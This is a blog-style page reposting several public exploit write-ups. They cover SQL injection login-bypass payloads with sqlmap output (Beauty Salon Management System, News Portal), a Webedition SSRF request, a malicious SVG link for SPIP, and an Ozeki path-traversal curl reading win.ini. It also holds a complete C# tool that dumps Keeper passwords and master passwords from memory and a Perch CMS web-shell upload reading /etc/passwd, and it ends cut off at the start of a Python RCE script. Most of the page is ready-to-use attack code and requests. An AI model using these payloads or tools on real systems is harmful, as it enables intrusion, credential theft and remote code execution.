# Exploit Title: Beauty Salon Management System v1.0 - SQLi
# Date of found: 04/07/2023
# Exploit Author: Fatih Nacar
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
# CWE: CWE-89
Vulnerability Description -
Beauty Salon Management System: V1.0, developed by Campcodes, has been
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
allows an attacker to manipulate login authentication with the SQL queries
and bypass authentication. The system fails to properly validate
user-supplied input in the username and password fields during the login
process, enabling an attacker to inject malicious SQL code. By exploiting
this vulnerability, an attacker can bypass authentication and gain
unauthorized access to the system.
Steps to Reproduce -
The following steps outline the exploitation of the SQL Injection
vulnerability in Beauty Salon Management System V1.0:
1. Open the admin login page by accessing the URL:
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
2. In the username and password fields, insert the following SQL Injection
payload shown inside brackets to bypass authentication for usename
parameter:
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In}
3.Execute the SQL Injection payload.
As a result of successful exploitation, the attacker gains unauthorized
access to the system and is logged in with administrative privileges.
Sqlmap results:
POST parameter 'username' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 793
HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
rvYF&password=test&login=Sign In
---
[15:58:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863114973
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter
poc request
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
## Exploit Title: spip v4.1.10 - Spoofing Admin account
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
## Description:
The malicious user can upload a malicious SVG file which file is not
filtered by a security function, and he can trick
the administrator of this system to check his logo by clicking on him
and visiting, maybe a very dangerous URL.
Wrong web app website logic, and not well sanitizing upload function.
STATUS: HIGH- Vulnerability
[+]Exploit:
```SVG
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<linearGradient id="badgeGradient">
<stop offset="0"/>
<stop offset="1"/>
</linearGradient>
</defs>
<g id="heading">
<a xlink:href= "https://rb.gy/74f0y">
<path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
<!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
<text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
</a>
</g>
</svg>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)
## Time spend:
00:37:00
# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10
##################################### Arbitrary File Read PoC
#####################################
curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
##################################### Arbitrary File Read PoC
#####################################
# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)
# Date: 09/07/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643
# Version: 4.0
# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example 1
-----------------------------------------------------------------------------------------------------------------------
Param: name, email, comment
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Content-Length: 277
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document
csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:55:26 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146161
<script>alert('comment successfully submit. Comment will be display after admin review ');</script>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>News Portal | Home Page
[...]
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Content-Length: 276
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document
csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:56:06 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 525
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
Stack trace:
#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')
#1 {main}
thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w
-----------------------------------------------------------------------------------------------------------------------
SQLMap example param 'comment':
-----------------------------------------------------------------------------------------------------------------------
sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:
---
Parameter: #2* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=
---
web application technology: PHP 8.1.17, Apache 2.4.56
bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)
## Example 2 - login to administration panel
-----------------------------------------------------------------------------------------------------------------------
Param: username
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 42
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close
username=admin'&password=Test%40123&login=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:00:53 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 505
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
Stack trace:
#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')
#1 {main}
thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close
username=admin''&password=Test%40123&login=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:02:15 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4733
Connection: close
Content-Type: text/html; charset=UTF-8
<script>alert('Invalid Details');</script>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="News Portal.">
<meta name="author" content="PHPGurukul">
<!-- App title -->
<title>News Portal | Admin Panel</title>
[...]
# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266
using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;
// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
// As a result of this one can extract credentials & master password from a victim after achieving low priv access
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper
static class Program
{
// To make sure we are targetting the right child process - check command line
public static string GetCommandLine(this Process process)
{
if (process is null || process.Id < 1)
{
return "";
}
string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
using (var searcher = new ManagementObjectSearcher(query))
using (var collection = searcher.Get())
{
var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
return managementObject != null ? (string)managementObject["CommandLine"] : "";
}
}
//Extract plain text credential JSON strings (regex inelegant but fast)
public static void extract_credentials(string text)
{
int index = text.IndexOf("{\"title\":\"");
int eindex = text.IndexOf("}");
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
int match_cut = match.IndexOf("} ");
if (match_cut != -1 )
{
match = match.Substring(0, match_cut + "} ".Length).TrimEnd();
if (!stringsList.Contains(match) && match.Length > 20)
{
Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");
stringsList.Add(match);
}
} else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
{
Console.WriteLine("->Credential Record Found : " + match + "\n");
stringsList.Add(match.TrimEnd());
}
index = text.IndexOf("{\"title\":\"", index + 1);
eindex = text.IndexOf("}", eindex + 1);
}
catch
{
return;
}
}
}
// extract account/email containing JSON string
public static void extract_account(string text)
{
int index = text.IndexOf("{\"expiry\"");
int eindex = text.IndexOf("}");
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
if ((match.Length > 2))
{
Console.WriteLine("->Account Record Found : " + match + "\n");
return;
}
index = text.IndexOf("{\"expiry\"", index + 1);
eindex = text.IndexOf("}", eindex + 1);
}
catch
{
return;
}
}
}
// Master password not available with SSO based logins but worth looking for.
// Disregard other data key entries that seem to match: _not_master_key_example
public static void extract_master(string text)
{
int index = text.IndexOf("data_key");
int eindex = index + 64;
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(data_key[ -~]+)");
var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
if (match_one.Replace("data_key", "").Length > 5)
{
if (!clean.IsMatch(match_one.Replace("data_key", "")))
{
Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
}
}
index = text.IndexOf("data_key", index + 1);
eindex = index + 64;
}
catch
{
return;
}
}
}
// Store extracted strings and comapre
public static List<string> stringsList = new List<string>();
// Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
// Performs OpenProcess to get handle with necessary query permissions
static void Main(string[] args)
{
foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
{
string commandline = GetCommandLine(process);
if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
{
Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
Console.WriteLine("->Searching...\n");
IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
IntPtr address = new IntPtr(0x10000000000);
MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
{
if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
{
byte[] buffer = new byte[(int)memInfo.RegionSize];
if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
{
string text = Encoding.ASCII.GetString(buffer);
extract_credentials(text);
extract_master(text);
extract_account(text);
}
}
address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
}
CloseHandle(processHandle);
}
}
}
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("ntdll.dll")]
public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
[StructLayout(LayoutKind.Sequential)]
public struct MEMORY_BASIC_INFORMATION
{
public IntPtr BaseAddress;
public IntPtr AllocationBase;
public uint AllocationProtect;
public IntPtr RegionSize;
public uint State;
public uint Protect;
public uint Type;
}
}
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file
poc.phar file contents :
<?php $a=$_GET['code']; echo system($a);?>
5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd
poc request:
POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"
test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream
<?php $a=$_GET['code']; echo system($a);?>
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"
1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"
admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"
test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"
Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"
edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"
5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--
#!/usr/bin/env python3
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone
def interactiveShell(fileUrl: str):
